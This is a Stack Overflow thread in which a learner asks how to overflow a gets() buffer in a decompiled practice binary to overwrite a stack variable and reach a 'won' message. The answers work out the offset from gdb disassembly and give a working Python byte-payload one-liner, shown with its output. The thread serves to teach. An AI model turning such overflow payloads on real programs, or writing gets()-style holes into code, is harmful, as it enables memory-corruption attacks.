0

This is an extract of a binary that is buffer overflowed. I decompiled it with Ghidra.

  char local_7 [32];
  long local_78;

  printf("Give it a try");
  gets(local_7);
      if (local_78 != 0x4141414141414141) {
        if (local_78 == 0x1122334455667788) {
          puts ("That's won")
        }
        puts("Let's continue");
      }

I'd like to understand why it is possible to make a buffer overflow.
I checked the "0x4141414141414141" hex value and saw it was related to "A" string. But what the conditions related to "0x4141414141414141" and "0x1122334455667788" exactly do ? And to be more precise, what the user could answer to get the message ("That's won") ?
Any explanations would be greatly appreciated, thanks !

___EDIT___
I have to add that I see these two hex values at using "disas main" command :

0x00000000000011a7 <+8>: movabs $0x4141414141414141,%rax  
0x00000000000011e6 <+71>: movabs $0x4141414141414141,%rax  
0x00000000000011f6 <+87>: movabs $0x1122334455667788,%rax

I tried a buffer overflow using python3 -c "print ('A' * 32 +'\x88\x77\x66\x55\x44\x33\x22\x11')" | ./ myBinary.
But I always have the "Let's continue" message. I'm not that far from the solution but I guess I miss a thing.. Could you help me what ?

___EDIT 2___ Before the gets :

  char local_7 [40];
  long local_78;
  
  local_78 = 0x4141414141414141;
  printf("Give it a try");
  fflush(stdout);
  gets(local_7);
  [... and so on]
Julien
  • 45
  • 1
  • 3
  • 15
  • 1
    `gets` is always dangerous, and the answer to your question is probably processor specific. Check the instruction set relevant to it – Basile Starynkevitch Apr 30 '21 at 20:25
  • 1
    `gets` will just continue reading and writing as long as there is input. So if the user enters more than 32 characters, `local_7` will overflow. You'll have to enter whatever 0x1122334455667788 is in ASCII after 32 other bytes to "win". – Emanuel P Apr 30 '21 at 22:16
  • @Emanuel Thank you very much for your answer. Does that mean the user has to enter 64 characters to overflow ? Moreover I checked the conversion of __0x1122334455667788__ in ASCII and I get something strange with characters uninterpreted.. Could you tell me what I'm doing wrong ? – Julien May 01 '21 at 13:30
  • I have to add that I see these following lines at using "disas main" command : ```0x00000000000011a7 <+8>: movabs $0x4141414141414141,%rax``` / ```0x00000000000011e6 <+71>: movabs $0x4141414141414141,%rax``` / ```0x00000000000011f6 <+87>: movabs $0x1122334455667788,%rax``` – Julien May 01 '21 at 15:27
  • I gave it a try with ```python3 -c "print ('A' * 32 +'\x88\x77\x66\x55\x44\x33\x22\x11')" | ./ myBinary``` but I always have the "Let's continue" message. I'm not that far from the solution but I guess I miss a thing.. – Julien May 01 '21 at 16:46
  • Likely [Why is the gets function so dangerous it should never be used](https://stackoverflow.com/q/1694036/3422102) (at least a smart compiler will flag it -- and it has been completely removed from C11) – David C. Rankin May 03 '21 at 09:58

2 Answers2

6

Here is the full disassembly:

(gdb) disassemble main
Dump of assembler code for function main:
   0x0000000000001189 <+0>:     endbr64 
   0x000000000000118d <+4>:     push   %rbp
   0x000000000000118e <+5>:     mov    %rsp,%rbp
   0x0000000000001191 <+8>:     sub    $0x30,%rsp
   0x0000000000001195 <+12>:    lea    0xe68(%rip),%rdi        # 0x2004
   0x000000000000119c <+19>:    mov    $0x0,%eax
   0x00000000000011a1 <+24>:    callq  0x1080 <printf@plt>
   0x00000000000011a6 <+29>:    lea    -0x30(%rbp),%rax
   0x00000000000011aa <+33>:    mov    %rax,%rdi
   0x00000000000011ad <+36>:    mov    $0x0,%eax
   0x00000000000011b2 <+41>:    callq  0x1090 <gets@plt>
   0x00000000000011b7 <+46>:    movabs $0x4141414141414141,%rax
   0x00000000000011c1 <+56>:    cmp    %rax,-0x8(%rbp)
   0x00000000000011c5 <+60>:    je     0x11ef <main+102>
   0x00000000000011c7 <+62>:    movabs $0x1122334455667788,%rax
   0x00000000000011d1 <+72>:    cmp    %rax,-0x8(%rbp)
   0x00000000000011d5 <+76>:    jne    0x11e3 <main+90>
   0x00000000000011d7 <+78>:    lea    0xe34(%rip),%rdi        # 0x2012
   0x00000000000011de <+85>:    callq  0x1070 <puts@plt>
   0x00000000000011e3 <+90>:    lea    0xe33(%rip),%rdi        # 0x201d
   0x00000000000011ea <+97>:    callq  0x1070 <puts@plt>
   0x00000000000011ef <+102>:   mov    $0x0,%eax
   0x00000000000011f4 <+107>:   leaveq
   0x00000000000011f5 <+108>:   retq

The important addresses can be determined from the instruction setting the gets parameter as local_7:

   0x00000000000011a6 <+29>:    lea    -0x30(%rbp),%rax

and the cmp instruction comparing the local_78 variable.

   0x00000000000011c1 <+56>:    cmp    %rax,-0x8(%rbp)

As you can see the local_7 is at -0x30(%rbp), and local_78 is at -0x8(%rbp), exactly 40 bytes after the buffer.

Your python command is not correct since you are using string operations which cause it to produce valid UTF-8, and therefore, extra bytes:

$ python3 -c "print ('A' * 40 +'\x88\x77\x66\x55\x44\x33\x22\x11')"|hd -v
00000000  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000010  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000020  41 41 41 41 41 41 41 41  c2 88 77 66 55 44 33 22  |AAAAAAAA..wfUD3"|
00000030  11 0a                                             |..|
00000032

Notice the c2 byte before 88. See the following question for details: Why is the output of print in python2 and python3 different with the same string?

If we instead use bytes types, we can get the correct output:

$ python3 -c "import sys; sys.stdout.buffer.write(b'A' * 40 + b'\x88\x77\x66\x55\x44\x33\x22\x11')"|hd -v
00000000  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000010  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000020  41 41 41 41 41 41 41 41  88 77 66 55 44 33 22 11  |AAAAAAAA.wfUD3".|
00000030

Using this input, we get the "That's won" message:

$ python3 -c "import sys; sys.stdout.buffer.write(b'A' * 40 + b'\x88\x77\x66\x55\x44\x33\x22\x11')"|./a.out 
Give it a tryThat's won
Let's continue
mkayaalp
  • 2,631
  • 10
  • 17
  • Thank you very much for your explanation, in particular the difference between string and bytes types.. But that's strange, I tried to paste ```AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.wfUD3".``` after the question asked by the binary and it returns ```Let's continue``` in spite of ```That's won```... Do you know why ? – Julien May 03 '21 at 13:17
  • You can't copy and paste the string output of `hd`, since it replaces non-ASCII and non-printable bytes with a `.`. `88` is not valid ASCII and `11` is vertical tab. – mkayaalp May 03 '21 at 13:23
  • Ok got it. So, if I run the binary and want to ask to the question, I have to paste ```python3 -c "import sys; sys.stdout.buffer.write(b'A' * 40 + b'\x88\x77\x66\x55\x44\x33\x22\x11')"``` right ? I tried it but the binary returns ```Let's continue``` and ```Segmentation fault (core dumped)``` – Julien May 03 '21 at 13:28
  • No. That would write the command `python3 -c ...` literally into the buffer. You are not going to be able to copy paste your exploit in general. In this case, your clipboard will drop `88` since it is not valid UTF-8, and your terminal will eat `11` since it is a control character (it's actually DC1, not vertical tab). That's why we use pipe instead. – mkayaalp May 03 '21 at 14:09
  • Ok thanks again.. Now I wrote ```python3 -c "import sys; sys.stdout.buffer.write(b'A' * 40 + b'\x88\x77\x66\x55\x44\x33\x22\x11')" | ./myBinary ``` but it return nothing excepts the initial question ```Give it a try```... – Julien May 03 '21 at 14:19
  • Does your binary accept any other input before the `gets`? – mkayaalp May 03 '21 at 14:27
  • See ___EDIT 2___ in my first post – Julien May 03 '21 at 14:37
3

This binary is vulnerable to a buffer overflow because it uses the gets() function, which is vulnerable, and deprecated because of that reason.

It will copy the user input to the passed buffer, without checking the size of the buffer. So, if the input of the user is larger than the available space, it will overflow in memory and potentially, overwrite other variables or structures that are located after the buffer.

That is the case of the long local_78; variable, which is in the stack after the buffer, so we can potentially overwrite its value.

To do so, we need to pass an input that is:

  • minimun 32 bytes, to fill the actual buffer. (A char (ASCII character) should usually equivalent to 1 byte)
  • plus, an additional variable number of bytes to fill the space between the buffer and the long variable (this is because a lot of times, compilers make optimization and may add other variables between those two, even if we haven't placed them just there in the code. The stack is a dynamic memory region so it's not often possible to 100% predict its layout)
  • plus, 8 bytes, which is typically the size of a long in most computer architectures (though it could be different, but let's assume this is x86/64). This is the value we will be overflowing the variable with.

We don't care about the stuff we put in the first 32+X bytes (except for the null byte). The program then checks for some special value of local_78, and if that check passes, it will execute puts ("That's won"); saying that you have "won" or successfully exploited the program and overwrote the memory.

The problem here, is that such value is 0x1122334455667788 (again, a long which is 8 bytes). We could read this separating its bytes: 0x11 0x22 0x33 0x44 0x55 0x66 0x77 0x88, and trying to see which byte corresponds to which character in ASCII The issue is that bytes like 0x22 are not ASCII representable characters, so you cannot type them directly into the console, because normal keyboards don't have a key that inputs the character 0x11 as it doesn't have a visual representation. You will need an additional program to exploit the program. Such program will need to use any mechanisms available in the Operating System to pass such values. In Linux for example this can be done using pipes / output redirection

78dtat78da
  • 112
  • 1
  • 9